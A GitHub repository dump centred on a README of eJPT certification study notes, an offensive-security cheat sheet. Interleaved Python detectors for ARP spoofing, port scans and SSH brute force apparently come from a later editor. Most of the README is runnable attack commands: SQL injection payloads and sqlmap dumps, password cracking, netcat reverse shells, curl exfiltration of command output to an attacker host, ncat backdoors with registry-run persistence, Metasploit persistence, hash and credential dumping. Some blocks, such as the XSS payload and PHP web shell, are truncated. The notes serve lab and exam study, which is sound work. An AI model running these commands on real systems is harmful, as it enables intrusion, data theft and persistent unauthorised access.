├── CNAME
├── ejpt.jpg
├── .github
├── FUNDING.yml
└── auto_assign.yml
└── README.md
/CNAME:
--------------------------------------------------------------------------------
1 | ejpt-notes.com
--------------------------------------------------------------------------------
/ejpt.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/eJPT-notes/HEAD/ejpt.jpg
--------------------------------------------------------------------------------
/.github/FUNDING.yml:
--------------------------------------------------------------------------------
1 | github: edoardottt
2 | liberapay: edoardottt
3 | patreon: edoardottt
4 | ko_fi: edoardottt
5 | open_collective: edoardottt
6 | custom: "https://www.paypal.me/edoardottt"
7 |
--------------------------------------------------------------------------------
/.github/auto_assign.yml:
--------------------------------------------------------------------------------
1 | # Set to true to add reviewers to pull requests
2 | addReviewers: true
3 |
4 | # A list of reviewers to be added to pull requests (GitHub user name)
5 | reviewers:
6 | - edoardottt
7 |
8 | # Keywords that skip adding reviewers when the pull request title includes one of them
9 | skipKeywords:
10 | - wip
11 |
12 | # A number of reviewers added to the pull request
13 | # Set 0 to add all the reviewers (default: 0)
14 | numberOfReviewers: 0
15 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
5 | > **Note**
6 | > These are all the notes I took while following the INE course for the eJPT certification. I strongly think everything you need to pass the exam is in this 'cheatsheet'.
7 |
8 | Notes by [@edoardottt](https://edoardottt.com/), exam passed with 19/20 score.
9 |
10 | Info about eJPT certification [here](https://security.ine.com/certifications/ejpt-certification/).
11 | Read also my [blog post](https://edoardottt.com/ejpt) about eJPT certification.
12 |
13 | #### Exam setup
14 |
15 | - Download the OVPN configuration file
16 | - `sudo openvpn file.ovpn`
17 | - Enter username and password
18 | - CTRL+Z
19 | - `bg`
20 |
21 | #### Add a route in IP routes
22 |
23 | Linux:
24 |
25 | ```bash
26 | ip route add <network/prefix> via <gateway>
27 | ```
28 |
29 | #### Show IP addresses
30 |
31 | Linux:
32 |
33 | ```bash
34 | ip addr
35 | ```
36 |
37 | #### Show CAM table
38 |
39 | Linux:
40 |
41 | ```bash
42 | ip neighbor
43 | ```
44 |
45 | or
46 |
47 | ```bash
48 | ifconfig
49 | ```
50 |
51 | #### Show Listening ports (both UDP and TCP)
52 |
53 | Linux:
54 |
55 | ```bash
56 | netstat -tulnp
57 | ```
58 |
59 | Windows:
60 |
61 | ```bash
62 | netstat -ano
63 | ```
64 |
65 | #### ARP Spoofing
66 |
67 | ```bash
68 | echo 1 > /proc/sys/net/ipv4/ip_forward
69 | ```
70 |
71 | ```bash
72 | arpspoof -i <interface> -t <target> -r <host>
73 | ```
74 |
75 | To intercept the traffic between 192.168.4.11 and 192.168.4.16
76 |
77 | ```bash
78 | arpspoof -i eth0 -t 192.168.4.11 -r 192.168.4.16
79 | ```
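
Defender's view of the `-t`/`-r` pair above, added here as an example that is not part of the original notes: it parses `ip neighbor` output and flags an IP whose MAC changed against a baseline snapshot, or one MAC answering for more than one IP. The two snapshots and all MAC addresses are constructed.

```python
import re
from collections import defaultdict

# Constructed `ip neighbor` snapshots taken before and during the poisoning; the MAC
# addresses are invented and de:ad:be:ef:00:01 stands for the attacker's interface.
BEFORE = """\
192.168.4.1 dev eth0 lladdr 00:11:22:33:44:01 REACHABLE
192.168.4.11 dev eth0 lladdr 00:11:22:33:44:11 STALE
192.168.4.16 dev eth0 lladdr 00:11:22:33:44:16 REACHABLE
"""
DURING = """\
192.168.4.1 dev eth0 lladdr 00:11:22:33:44:01 REACHABLE
192.168.4.11 dev eth0 lladdr DE:AD:BE:EF:00:01 REACHABLE
192.168.4.16 dev eth0 lladdr de:ad:be:ef:00:01 REACHABLE
192.168.4.99 dev eth0  FAILED
"""

# Resolved entries carry "lladdr <mac>"; FAILED/INCOMPLETE entries do not and are skipped.
NEIGH_RE = re.compile(r"^(\S+) dev \S+ lladdr ([0-9A-Fa-f:]{17})")


def parse_ip_neighbor(text):
    """Return {ip: mac} for the resolved entries of an `ip neighbor` dump (MACs lowercased)."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line)
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table


def detect_arp_spoofing(baseline, current):
    """Return alert strings for the two signatures of arpspoof -t <target> -r <host>:
    1. an IP whose MAC differs from the baseline (the victims' entries get overwritten);
    2. one MAC answering for several IPs (the attacker impersonates both ends).
    Legitimate causes exist for both (NIC swap, IP aliases), so treat them as leads.
    """
    alerts = []
    for ip, mac in current.items():
        if ip in baseline and baseline[ip] != mac:
            alerts.append(f"{ip}: MAC changed {baseline[ip]} -> {mac}")
    by_mac = defaultdict(set)
    for ip, mac in current.items():
        by_mac[mac].add(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            alerts.append(f"{mac}: answers for {sorted(ips)}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(parse_ip_neighbor(BEFORE), parse_ip_neighbor(DURING)):
        print(alert)
```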
80 |
81 | #### Ping sweeping
82 |
83 | ```bash
84 | fping -a -g 192.168.1.0/24 2> /dev/null
85 | ```
86 |
87 | or
88 |
89 | ```bash
90 | fping -a -f targets.txt 2>/dev/null
91 | ```
92 |
93 | or
94 |
95 | ```bash
96 | nmap -sn 192.168.1.0/24
97 | ```
98 |
99 | or
100 |
101 | ```bash
102 | nmap -sn -iL networks.txt
103 | ```
104 |
105 | #### OS Fingerprinting
106 |
107 | ```bash
108 | nmap -Pn -O <target>
109 | ```
110 |
111 | #### Port Scanning
112 |
113 | `nmap` does the port scanning. Remember the scan types:
114 |
115 | - `-sT`: TCP Connect Scan, usually recorded in application logs
116 | - `-sS`: TCP SYN Scan, usually not recorded in application logs (a well-configured IDS still logs it)
117 | - `-sV`: Version Detection Scan, TCP Connect Scan + Banner Detection
118 |
119 | Example:
120 |
121 | ```bash
122 | nmap -sS -p 1-100,443 192.168.1.13,14
123 | ```
124 |
125 | Tip: Use `--reason` to show the explanation of why a port is marked open or closed
126 | Tip: Use `--open` to show only open, open|filtered, and unfiltered ports.
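
Why a SYN scan that never reaches the application logs is still visible to a firewall or IDS, as an added example that is not part of the original notes: a detector over constructed firewall-style log lines that flags a source touching many distinct `host:port` pairs in a short window. The log format, the scanner address and the threshold are assumptions.

```python
import re
from collections import defaultdict, deque

# Constructed firewall log format (assumption): "<epoch> SRC=<ip> DST=<ip> DPT=<port> FLAGS=S".
LINE_RE = re.compile(r"^(\d+) SRC=(\S+) DST=(\S+) DPT=(\d+) FLAGS=S$")


def build_sample_log():
    """Constructed sample: one host replaying `nmap -sS -p 1-100,443 192.168.1.13,14`
    at ten SYNs per second, plus a normal client that only ever talks to .13:443."""
    lines = []
    i = 0
    for dst in ("192.168.1.13", "192.168.1.14"):
        for port in list(range(1, 101)) + [443]:
            lines.append(f"{1000 + i // 10} SRC=192.168.1.7 DST={dst} DPT={port} FLAGS=S")
            i += 1
    for ts in (1000, 1005, 1020):
        lines.append(f"{ts} SRC=192.168.1.50 DST=192.168.1.13 DPT=443 FLAGS=S")
    lines.append("garbage line the parser must skip")
    return lines


def parse_line(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    return int(m.group(1)), m.group(2), m.group(3), int(m.group(4))


def detect_port_scans(lines, window=10, threshold=20):
    """Return {src: ts} for sources whose SYNs reached more than `threshold` distinct
    (dst, port) pairs within `window` seconds; ts is when the threshold was crossed.
    A half-open scan never completes the handshake, so the application logs stay
    empty; the SYNs themselves are what a firewall or IDS records."""
    recent = defaultdict(deque)
    alerted = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ts, src, dst, dport = rec
        q = recent[src]
        q.append((ts, dst, dport))
        while q and q[0][0] < ts - window:
            q.popleft()
        targets = {(d, p) for _, d, p in q}
        if len(targets) > threshold and src not in alerted:
            alerted[src] = ts
    return alerted


if __name__ == "__main__":
    for src, ts in detect_port_scans(build_sample_log()).items():
        print(f"possible port scan from {src} at t={ts}")
```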
127 |
128 | TCP Quick Scan
129 |
130 | ```bash
131 | nmap -sV -sC 192.168.1.1
132 | ```
133 |
134 | TCP Full Scan
135 |
136 | ```bash
137 | nmap -sV -sC -p- 192.168.1.1
138 | ```
139 |
140 | UDP Quick Scan
141 |
142 | ```bash
143 | nmap -sV -sU 192.168.1.1
144 | ```
145 |
146 | Get info on a particular service
147 |
148 | ```bash
149 | nmap -sC -p 27017 192.168.1.13 | less
150 | ```
151 |
152 | #### Masscan
153 |
154 | Check if masscan is properly installed:
155 |
156 | ```bash
157 | masscan --regress
158 | ```
159 |
160 | Scan example:
161 |
162 | ```bash
163 | masscan -p22,80,443,53,3389,8080,445 -Pn --rate=800 --banners 192.168.1.0/24
164 | ```
165 |
166 | If you want to use a VPN connection (configure the options properly):
167 |
168 | ```bash
169 | masscan -p22,80,443,53,3389,8080,445 -Pn --rate=800 --banners 192.168.1.0/24 -e tap0 --router-ip 192.168.1.1
170 | ```
171 |
172 | In order to save the configuration into a file:
173 |
174 | ```bash
175 | masscan -p22,80,443,53,3389,8080,445 -Pn --rate=800 --banners 192.168.1.0/24 --echo > masscan.conf
176 | ```
177 |
178 | Use the configuration file as input:
179 |
180 | ```bash
181 | masscan -c masscan.conf
182 | ```
183 |
184 | #### Web Fingerprinting
185 |
186 | Using netcat:
187 |
188 | ```bash
189 | nc 192.168.1.2 80
190 | HEAD / HTTP/1.1
191 | ```
192 |
193 | Using openssl:
194 |
195 | ```bash
196 | openssl s_client -connect target.site:443
197 | HEAD / HTTP/1.1
198 | ```
199 |
200 | Using httprint:
201 |
202 | ```bash
203 | httprint -P0 -h 192.168.1.1 -s /usr/local/bin/signatures.txt
204 | ```
205 |
206 | #### Directory/Files enumeration with dirb
207 |
208 | Default scan:
209 |
210 | ```bash
211 | dirb http://google.com
212 | ```
213 |
214 | Using a custom wordlist:
215 |
216 | ```bash
217 | dirb http://google.com /usr/share/dirb/wordlists/small.txt
218 | ```
219 |
220 | Using cookies:
221 |
222 | ```bash
223 | dirb http://google.com -c "COOKIE:XYZ"
224 | ```
225 |
226 | Using Basic Authentication:
227 |
228 | ```bash
229 | dirb http://google.com -u "admin:password"
230 | ```
231 |
232 | Using Custom Header:
233 |
234 | ```bash
235 | dirb http://google.com -H "MyHeader: MyContent"
236 | ```
237 |
238 | Disable recursive enumeration:
239 |
240 | ```bash
241 | dirb http://google.com -r
242 | ```
243 |
244 | Set Speed delay in milliseconds:
245 |
246 | ```bash
247 | dirb http://google.com -z 1000
248 | ```
249 |
250 | Specify extensions:
251 |
252 | ```bash
253 | dirb http://google.com -X ".php,.bak"
254 | ```
255 |
256 | Save results in a file:
257 |
258 | ```bash
259 | dirb http://google.com -o results.txt
260 | ```
261 |
262 | #### Google Dorks
263 |
264 | - `site:` Include only results on a given hostname
265 | - `intitle:` Filters according to the title of a page
266 | - `inurl:` Similar to intitle but works on the URL of a resource
267 | - `filetype:` Filters by using the file extension of a resource
268 | - `AND`, `OR`, `|` Use logical operators to combine your expressions
269 | - `-` Filter out a keyword or a command's result
270 |
271 | Example: `-inurl:(htm|html|php|asp|jsp) intitle:"index of" "last modified" "parent directory" txt OR doc OR pdf`
272 | See also the [Google Hacking Database](https://www.exploit-db.com/google-hacking-database)
273 |
274 | #### XSS
275 |
276 | Payload: ``
277 | Server:
278 |
279 | ```php
280 |
287 | ```
288 |
289 | #### SQLi
290 |
291 | Payloads:
292 |
293 | - `' OR 'a'='a`
294 | - `' UNION SELECT Username, Password FROM Accounts WHERE 'a'='a`
295 | - `' OR substr(user(),1,1) = 'a`
296 | - `' UNION SELECT user(); -- -`
297 |
298 | Sqlmap:
299 |
300 | - `sqlmap -u 'http://victim.site/view.php?id=1141' --cookie "PHPSESSID=m42ba4etbktcktvjadirnsqqg4;"`
301 | - `sqlmap -u 'http://victim.site/view.php?id=1141' -p id --technique=U`
302 | - `sqlmap -u 'http://victim.site/view.php?id=1141' --banner`
303 | - `sqlmap -u 'http://victim.site/view.php?id=1141' -v3 --fresh-queries`
304 | - `sqlmap -u 'http://victim.site/view.php?id=1141' --users`
305 | - `sqlmap -u 'http://victim.site/view.php?id=1141' --dbs`
306 | - `sqlmap -u 'http://victim.site/view.php?id=1141' --tables`
307 | - `sqlmap -u 'http://victim.site/view.php?id=1141' -D <database> -T <table>`
308 | - `sqlmap -u 'http://victim.site/view.php?id=1141' --current-db --columns`
309 | - `sqlmap -u 'http://victim.site/view.php?id=1141' --current-db --dump`
310 | - `sqlmap -u 'http://victim.site/login.php' --data='user=a&pass=a' -p user --technique=B --banner`
311 | - `sqlmap -r post-vuln-sqli.txt -p user --technique=B --banner`
312 |
313 | Tip: Dump only the data you're interested in, not the whole database. Dumping a lot of data using SQLi is very noisy and a heavy process.
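
What the first two payloads do to the query behind a page like `view.php`, as an added example that is not from the original notes: a string-built query beside its parameterized version, run against a constructed SQLite database. The `user()` payloads are MySQL-specific and are not reproduced here.

```python
import sqlite3

OR_PAYLOAD = "' OR 'a'='a"
UNION_PAYLOAD = "' UNION SELECT Username, Password FROM Accounts WHERE 'a'='a"


def make_db():
    """Constructed stand-in for the backend of view.php (plaintext passwords only so
    that the dump is visible; real systems must store password hashes)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Articles(id INTEGER, title TEXT);
        INSERT INTO Articles VALUES (1141, 'Welcome'), (1142, 'About us');
        CREATE TABLE Accounts(Username TEXT, Password TEXT);
        INSERT INTO Accounts VALUES ('admin', 'Winter2024!'), ('bob', 'hunter2');
    """)
    return conn


def search_vulnerable(conn, title):
    """String-built query: the payload's leading quote closes the literal and the
    remainder is parsed as SQL. `' OR 'a'='a` makes the WHERE clause always true;
    the UNION payload appends a second SELECT with the same column count."""
    query = f"SELECT id, title FROM Articles WHERE title = '{title}'"
    return conn.execute(query).fetchall()


def search_safe(conn, title):
    """Bound parameter: the driver passes the value separately from the statement,
    so the quote and the keywords are only compared against the title column."""
    return conn.execute("SELECT id, title FROM Articles WHERE title = ?", (title,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    for payload in (OR_PAYLOAD, UNION_PAYLOAD):
        print("vulnerable:", search_vulnerable(db, payload))
        print("safe:      ", search_safe(db, payload))
```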
314 |
315 | #### Misconfigured PUT method
316 |
317 | ```bash
318 | wc -m payload.php
319 | 20 payload.php
320 | ```
321 |
322 | ```bash
323 | nc victim.site 80
324 | PUT /payload.php HTTP/1.1
325 | Host: victim.site
326 | Content-type: text/html
327 | Content-length: 20
328 |
329 |
330 | ```
331 |
332 | #### Uploading PHP shell
333 |
334 | ```php
335 | ';
340 | $result = shell_exec($cmd);
341 | echo $result;
342 | echo '';
343 | }
344 | ?>
345 | ```
346 |
347 | #### Authentication Cracking with Hydra
348 |
349 | - `hydra -U http-post-form` (get info on a module)
350 | - `hydra -L users.txt -P passwords.txt <target> <service>`
351 | - `hydra crackme.site http-post-form "/login.php:user=^USER^&pwd=^PASS^:invalid credentials" -L users.txt -P passwords.txt -f -V`
352 | - `hydra 192.168.1.2 ssh -L users.txt -P passwords.txt -f -V`
353 |
354 | #### Authentication Cracking with nmap
355 |
356 | - `nmap -p 22 --script ssh-brute --script-args userdb=/root/users.txt demo.ine.local`
357 |
358 | #### Authentication Cracking with metasploit
359 |
360 | - `use auxiliary/scanner/ssh/ssh_login`
361 | - `set RHOSTS demo.ine.local`
362 | - `set USERPASS_FILE /usr/share/wordlists/metasploit/root_userpass.txt`
363 | - `set STOP_ON_SUCCESS true`
364 | - `set verbose true`
365 | - `exploit`
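
Detection-side counterpart to the SSH guessing commands above (hydra `ssh`, nmap `ssh-brute`, Metasploit `ssh_login`), added here as an example and not part of the original notes: it parses constructed sshd lines from `auth.log`, flags a source with a burst of failures, and marks a success that follows the burst as a likely compromised account. Log lines, addresses and thresholds are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed /var/log/auth.log excerpt: a wordlist attack against sshd from 192.168.1.9 that
# ends with one success (as hydra -f would), and a user who simply mistyped once.
AUTH_LOG = """\
Jan 10 10:00:01 host sshd[2001]: Failed password for invalid user oracle from 192.168.1.9 port 51001 ssh2
Jan 10 10:00:01 host sshd[2002]: Failed password for root from 192.168.1.9 port 51002 ssh2
Jan 10 10:00:02 host sshd[2003]: Failed password for admin from 192.168.1.9 port 51003 ssh2
Jan 10 10:00:02 host sshd[2004]: Failed password for invalid user test from 192.168.1.9 port 51004 ssh2
Jan 10 10:00:03 host sshd[2005]: Failed password for invalid user guest from 192.168.1.9 port 51005 ssh2
Jan 10 10:00:03 host sshd[2006]: Failed password for admin from 192.168.1.9 port 51006 ssh2
Jan 10 10:00:04 host sshd[2007]: Accepted password for admin from 192.168.1.9 port 51007 ssh2
Jan 10 10:03:30 host sshd[2100]: Failed password for alice from 192.168.1.20 port 40001 ssh2
Jan 10 10:03:45 host sshd[2101]: Accepted password for alice from 192.168.1.20 port 40002 ssh2
"""
SSHD_RE = re.compile(
    r"^\w{3} +\d+ (\d\d):(\d\d):(\d\d) \S+ sshd\[\d+\]: (Failed|Accepted) password for "
    r"(?:invalid user )?(\S+) from (\S+) port \d+"
)


def parse_auth_log(text):
    """Return (seconds_of_day, result, user, src) per sshd password event; other lines are skipped."""
    events = []
    for line in text.splitlines():
        m = SSHD_RE.match(line)
        if m:
            h, mi, s, result, user, src = m.groups()
            events.append((int(h) * 3600 + int(mi) * 60 + int(s), result, user, src))
    return events


def detect_password_guessing(events, window=60, threshold=5):
    """Return {src: {"users": [...], "compromised": user_or_None}} for sources with at least
    `threshold` failed logins inside `window` seconds. A success from the same source while
    the burst is still inside the window is the hydra -f outcome: that account comes first."""
    recent_fails = defaultdict(list)
    findings = {}
    for ts, result, user, src in events:
        fails = [f for f in recent_fails[src] if f[0] >= ts - window]
        if result == "Failed":
            fails.append((ts, user))
            if len(fails) >= threshold and src not in findings:
                findings[src] = {"users": sorted({u for _, u in fails}), "compromised": None}
        elif src in findings and len(fails) >= threshold and findings[src]["compromised"] is None:
            findings[src]["compromised"] = user
        recent_fails[src] = fails
    return findings


if __name__ == "__main__":
    for src, info in detect_password_guessing(parse_auth_log(AUTH_LOG)).items():
        print(f"{src}: guessed {info['users']}, compromised account: {info['compromised']}")
```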
366 |
367 | #### Password cracking using John the Ripper
368 |
369 | - `unshadow /etc/passwd /etc/shadow > crackme.txt`
370 | - `john --incremental -users:<users> crackme.txt` (bruteforce, don't use it!)
371 | - `john --show crackme.txt`
372 | - `john --wordlist=<wordlist> crackme.txt`
373 | - `john --wordlist=<wordlist> --rules crackme.txt` (enable word mangling)
374 |
375 | #### Cracking Password of Microsoft Word file using John the Ripper
376 |
377 | - `/usr/share/john/office2john.py MS_Word_Document.docx > hash`
378 | - `john --wordlist=passwds.txt hash`
379 |
380 | #### Password cracking using Hashcat
381 |
382 | - `hashcat -m 0 -a 0 -D2 example0.hash example.dict` (m = 0 is MD5)
383 | - `hashcat -m 0 -a 0 -D2 example0.hash example.dict -r custom.rule`
384 |
385 | #### Windows Shares
386 |
387 | Interesting shares:
388 |
389 | - `\\ComputerName\C$` lets an administrator access a volume (C$, D$, E$...)
390 | - `\\ComputerName\admin$` points to the Windows installation directory
391 |
392 | Enumerating shares (Windows):
393 |
394 | - `nbtstat -A 192.168.1.11`
395 | - `net view 192.168.1.11`
396 | - `net use \\192.168.1.11\IPC$ '' /u:''` (null session attack)
397 | - `enum -S 192.168.1.11` ([enum](https://packetstormsecurity.com/search/?q=win32+enum&s=files))
398 | - `enum -U 192.168.1.11`
399 | - `enum -P 192.168.1.11`
400 |
401 | Enumerating shares (Linux):
402 |
403 | - `nmblookup -A 192.168.1.11`
404 | - `smbclient -L //192.168.1.11 -N`
405 | - `smbclient //192.168.1.11/IPC$ -N` (null session attack)
406 | - `enum4linux -n 192.168.1.11`
407 | - `enum4linux -P 192.168.1.11`
408 | - `enum4linux -S 192.168.1.11`
409 | - `enum4linux -s /usr/share/enum4linux/share-list.txt 192.168.1.11`
410 | - `enum4linux -a 192.168.1.11`
411 | - `smbmap -H demo.ine.local`
412 | - `nmap -sU -sV -p137,138 demo.ine.local`
413 | - `nmap --script=smb-enum-shares -Pn 192.168.1.11`
414 | - `nmap --script=smb-enum-users -Pn 192.168.1.11`
415 | - `nmap --script=smb-brute -Pn 192.168.1.11`
416 | - `nmap --script smb-vuln-* -Pn 192.168.1.11`
417 | - `python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.1.11`
418 |
419 | #### Metasploit
420 |
421 | ```bash
422 | msfconsole
423 | ```
424 |
425 | ```bash
426 | show -h
427 | ```
428 |
429 | ```bash
430 | search <keyword>
431 | ```
432 |
433 | ```bash
434 | use <module>
435 | ```
436 |
437 | ```bash
438 | show options
439 | ```
440 |
441 | ```bash
442 | set <option> <value>
443 | ```
444 |
445 | ```bash
446 | exploit
447 | ```
448 |
449 | Tip: Use `show payloads` when an exploit is selected to show only the available payloads for that exploit
450 | Tip: Use `info` when an exploit is selected to get information about the exploit
451 | Tip: Use `back` when an exploit is selected to unselect it and return to the main prompt
452 |
453 | #### Meterpreter
454 |
455 | Inside metasploit:
456 |
457 | - `search meterpreter`
458 | - `set payload <payload>`
459 | - `background`
460 | - `sessions -l` (list the sessions)
461 | - `sessions -i <id>` (resume a background session)
462 | - `sysinfo`
463 | - `ifconfig`
464 | - `route`
465 | - `getuid`
466 | - `getsystem`
467 | - You can use Unix-like commands like `pwd`, `ls`, `cd`...
468 | - `download <remote file> <local path>`
469 | - `upload <local file> <remote path>`
470 | - `shell`
471 | - `hashdump`
472 | - `run autoroute -h`
473 | - `run autoroute -s 192.130.110.0 -n 255.255.255.0` (pivoting towards that network)
474 |
475 | Tip: `help` shows an amazing list of available commands divided by category
476 | Tip: If `getsystem` fails, use `use exploit/windows/local/bypassuac`
477 | Tip: `ps -U SYSTEM` shows only the processes with SYSTEM privileges
478 | Tip: Use `post/windows/gather/hashdump` to dump the passwords DB and save it for an offline cracking session
479 |
480 | #### Pivoting with Meterpreter
481 |
482 | Let's say we have compromised a machine using metasploit and we have a meterpreter shell with session id 1. We discover that there is another machine but it's reachable only from the compromised machine.
483 | Our IP: `192.180.40.2`
484 | Compromised host: `192.180.40.3`
485 | Unreachable machine: `192.130.110.3`
486 |
487 | - `meterpreter > run autoroute -s 192.130.110.0 -n 255.255.255.0 1`
488 | - `background`
489 | - `msf > route`
490 |
491 | If we want to scan the `192.130.110.0/24` network we can use:
492 |
493 | ```bash
494 | msf > use auxiliary/scanner/portscan/tcp
495 | msf > set PORTS 80, 8080, 445, 21, 22, ...
496 | msf > set RHOSTS 192.130.110.1-254
497 | msf > exploit
498 | ```
499 |
500 | If we discover that at least one port is open and we want to target a specific port on a specific host (e.g. `192.130.110.3:21`) we can use:
501 |
502 | - `sessions 1` (back to meterpreter session)
503 | - `portfwd add -l 1234 -p 21 -r 192.130.110.3` (forwarding remote machine port 21 to the local machine port 1234)
504 | - `portfwd list`
505 | - `background`
506 |
507 | Then if we want to scan the service we can use nmap:
508 |
509 | ```bash
510 | msf > nmap -sS -sV -p 1234 localhost
511 | ```
512 |
513 | #### Reverse shell with Netcat
514 |
515 | Attacker:
516 |
517 | ```bash
518 | nc -lvp 8888
519 | ```
520 |
521 | Target (the IP of the attacker; the target runs the shell and connects back):
522 |
523 | ```bash
524 | nc -v 192.168.1.1 8888 -e /bin/bash
525 | ```
526 |
527 | #### Generate a reverse shell payload with msfvenom
528 |
529 | ```bash
530 | msfvenom --list payloads | grep <keyword>
531 | ```
532 |
533 | ```bash
534 | msfvenom -p php/reverse_php lhost=192.168.0.58 lport=443 -o reverse.php
535 | ```
536 |
537 | ```bash
538 | msfvenom -p linux/x64/shell/reverse_tcp lhost=192.168.0.58 lport=443 -f elf -o reverse443
539 | chmod +x reverse443
540 | ```
541 |
542 | Note: If you have generated a meterpreter payload, you have to catch the connection with Metasploit (`exploit/multi/handler`) rather than with netcat
543 |
544 | #### Blind Remote Code Execution
545 |
546 | Target (Use the Attacker IP)
547 |
548 | ```bash
549 | curl http://192.168.1.130:53/`whoami`
550 | ```
551 |
552 | or
553 |
554 | ```bash
555 | curl http://192.168.1.130:53/`id | base64`
556 | ```
557 |
558 | Attacker:
559 |
560 | ```bash
561 | nc -lvp 53
562 | ```
563 |
564 | Tip: You can also create a reverse shell with `msfvenom` and let the target download it
565 |
566 | #### Enumerating users history with meterpreter
567 |
568 | - `background`
569 | - `use post/linux/gather/enum_users_history`
570 | - `set SESSION 1`
571 | - `exploit`
572 |
573 | #### Data exfiltration with Netcat
574 |
575 | Receiver:
576 |
577 | ```bash
578 | nc -lvnp 8888 > received.txt
579 | ```
580 |
581 | Sender (the IP of the receiver):
582 |
583 | ```bash
584 | cat message.txt | nc -v 192.168.1.1 8888
585 | ```
586 |
587 | #### Backdoor using ncat
588 |
589 | Victim:
590 |
591 | ```bash
592 | ncat -l -p 5555 -e cmd.exe
593 | ```
594 |
595 | Attacker (the IP of the victim):
596 |
597 | ```bash
598 | ncat 192.168.1.66 5555
599 | ```
600 |
601 | #### Reverse Backdoor using ncat
602 |
603 | Attacker:
604 |
605 | ```bash
606 | ncat -l -p 5555 -v
607 | ```
608 |
609 | Victim (the IP of the attacker):
610 |
611 | ```bash
612 | ncat -e cmd.exe 192.168.1.66 5555
613 | ```
614 |
615 | Tip: For persistent reverse backdoor use the registry key `Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`
616 |
617 | #### Reverse Backdoor using Metasploit
618 |
619 | ```bash
620 | msfconsole
621 | use exploit/windows/local/s4u_persistence
622 | show options
623 | sessions
624 | set session <id>
625 | set trigger logon
626 | set payload windows/meterpreter/reverse_tcp
627 | set lhost <attacker ip>
628 | set lport 1234
629 | exploit
630 | use exploit/multi/handler
631 | set payload windows/meterpreter/reverse_tcp
632 | show options
633 | set lhost <attacker ip>
634 | set lport 1234
635 | exploit
636 | sysinfo
637 | ps
638 | help
639 | ```
640 |
641 | Tip: once we get a shell we can use `screenshot` to get a picture of what the victim is seeing on the Desktop
642 | Tip: once we get a shell we can use `download filename location` to save the filename in the specified location on our machine
643 | Tip: Same syntax as above but use `upload` to upload files
644 | Tip: Use `getsystem` to gain the highest privilege (i.e. SYSTEM) on the compromised machine and `getuid` to check if it actually worked.
645 |
646 | #### Upgrading a simple shell
647 |
648 | ```bash
649 | bash -i
650 | ```
651 |
652 | ```bash
653 | python -c 'import pty; pty.spawn("/bin/sh")'
654 | ```
655 |
656 | #### Maintaining access using Metasploit (Windows)
657 |
658 | Inside a meterpreter session:
659 |
660 | - `background`
661 | - `use exploit/windows/local/persistence_service`
662 | - `show options`
663 | - `set SESSION <session id>`
664 | - `exploit`
665 |
666 | Use the backdoor:
667 |
668 | - `background`
669 | - `sessions -K`
670 | - `use exploit/multi/handler`
671 | - `set PAYLOAD windows/meterpreter/reverse_tcp`
672 | - `set LHOST <attacker ip>`
673 | - `set LPORT 4444`
674 | - `exploit`
675 |
676 | Note: The `<session id>` is the one printed when you type `background`
677 | Note: We need to use the same information about the backdoor to receive a new meterpreter session on the multi-handler. We can't change Payload, IP or Ports details.
678 |
679 | #### Pivoting using a SOCKS Proxy
680 |
681 | You have access to a compromised host, and only from there can you reach another machine. That machine exposes a web server; to access it from your own computer, set up a SOCKS proxy.
682 |
683 | Add the route to the unreachable network using autoroute or route.
684 |
685 | ```bash
686 | msf > use auxiliary/server/socks_proxy
687 | msf > set VERSION 4a
688 | msf > set SRVPORT 9050
689 | msf > run -j
690 | ```
691 |
692 | ```bash
693 | root@INE:~# proxychains nmap ...
694 | ```
695 |
696 | Then you can also set up Firefox to send its requests through the SOCKS v4 proxy at `127.0.0.1:9050`.
697 |
698 | #### Dump AutoLogin stored credentials
699 |
700 | Inside a meterpreter session:
701 |
702 | - `migrate -N explorer.exe`
703 | - `background`
704 | - `use post/windows/gather/credentials/windows_autologin`
705 | - `set SESSION <session id>`
706 | - `exploit`
707 |
708 | ----------
709 |
710 | If you find an error or want to improve this page, just [open an issue](https://github.com/edoardottt/eJPT-notes/issues).
711 |
712 | **Don't** text/mail me looking for exam solutions.
713 |
--------------------------------------------------------------------------------